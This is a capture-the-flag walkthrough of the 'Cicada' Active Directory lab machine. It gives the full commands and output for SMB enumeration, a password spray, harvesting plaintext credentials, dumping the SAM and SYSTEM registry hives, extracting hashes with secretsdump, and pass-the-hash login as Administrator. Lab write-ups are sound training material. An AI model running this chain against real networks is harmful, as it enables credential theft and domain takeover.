Cicada.
Easy
Windows
Active Directory
SMB
Password Spray
secretsdump
Easy Windows Active Directory machine. Anonymous SMB access exposes an HR notice
with a default password. Password spraying identifies the valid user, whose
credentials are later found in a backup script on a share — leading to a full
domain compromise via secretsdump.
User Flag
obtained via emily.oscars
Root Flag
obtained via Administrator hash
01Reconnaissance
Full port scan reveals a standard Windows AD target — DNS, Kerberos, LDAP, SMB, WinRM. Clock skew of +7h noted for any future Kerberos operations.
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.231.149
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap Domain: cicada.htb
445/tcp open microsoft-ds
5985/tcp open http WinRM
|_clock-skew: mean: 7h00m01s
finding: standard AD stack. SMB on 445 and WinRM on 5985 are the primary attack surface. +7h clock skew noted.
02SMB Enumeration
Anonymous SMB access is enabled. The HR share contains a notice to new hires with a default password in plaintext. The DEV share contains a PowerShell backup script with hardcoded credentials.
$ nxc smb 10.129.231.149 -u guest -p '' --shares
HR READ
DEV READ
IPC$ READ
$ smbclient //10.129.231.149/HR -N
smb: \> get "Notice from HR.txt"
The HR notice reveals the default password for new hires:
Dear new hire!
Your default password is:
Cicada$M6Corpb*@Lp#nZp!8
Please change it on first login.
Now enumerate domain users via RID brute-force to build a spray target list:
$ nxc smb 10.129.231.149 -u guest -p '' --rid-brute
500: CICADA\Administrator
501: CICADA\Guest
502: CICADA\krbtgt
1104: CICADA\john.smoulder
1105: CICADA\sarah.dantelia
1106: CICADA\michael.wrightson
1108: CICADA\david.orelious
1109: CICADA\emily.oscars
finding: 5 domain users enumerated. Default password from HR notice ready to spray.
03Password Spray
Spray the default password against all enumerated users. Only one account hasn't changed it yet.
$ nxc smb 10.129.231.149 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
CICADA\john.smoulder [-] STATUS_LOGON_FAILURE
CICADA\sarah.dantelia [-] STATUS_LOGON_FAILURE
CICADA\michael.wrightson [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
CICADA\david.orelious [-] STATUS_LOGON_FAILURE
CICADA\emily.oscars [-] STATUS_LOGON_FAILURE
With michael.wrightson credentials, enumerate the DEV share — a PowerShell backup script leaks emily.oscars's password in plaintext:
$ smbclient //10.129.231.149/DEV -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8'
smb: \> get Backup_script.ps1
# Contents:
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
credentials: emily.oscars : Q!3@Lp#M6b*7t*Vt
05Privilege Escalation — Backup Operators → secretsdump
Members of Backup Operators have SeBackupPrivilege — they can copy any file bypassing ACLs, including the registry hives. Dump SAM and SYSTEM, then use secretsdump locally to extract the Administrator hash.
# dump registry hives (SeBackupPrivilege allows this)
*EWR* reg save HKLM\SAM C:\Temp\sam.hive
*EWR* reg save HKLM\SYSTEM C:\Temp\system.hive
# download to attacker
*EWR* download C:\Temp\sam.hive
*EWR* download C:\Temp\system.hive
$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator NT hash: 2b87e7c93a3e8a0ea4a581937016f341
06Root Flag
Pass-the-Hash with the Administrator NT hash for a full domain shell.
$ evil-winrm -i 10.129.231.149 -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
*EWR* type C:\Users\Administrator\Desktop\root.txt
a98dee7************************
chain: SMB guest → HR default password → spray → michael.wrightson → DEV share → emily.oscars creds → Backup Operators → SeBackupPrivilege → secretsdump → Administrator PTH